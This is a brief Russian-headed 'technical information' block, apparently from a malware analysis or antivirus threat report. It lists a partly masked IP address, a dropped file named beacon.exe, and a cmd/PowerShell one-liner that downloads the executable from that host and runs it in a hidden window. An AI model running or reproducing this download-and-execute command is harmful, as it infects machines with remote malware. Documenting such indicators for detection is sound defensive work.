Техническая информация
- http://78.##.17.88:8443/beacon.exe as %temp%\beacon.exe
- '<SYSTEM32>\cmd.exe' "/c powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.##.17.88:8443/beacon.exe', '%temp%\beacon.exe') && %temp%\beacon.exe"
- '78.#5.17.88':8443
- '<SYSTEM32>\cmd.exe' "/c powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.##.17.88:8443/beacon.exe', '%temp%\beacon.exe') && %temp%\beacon.exe"' (со скрытым окном)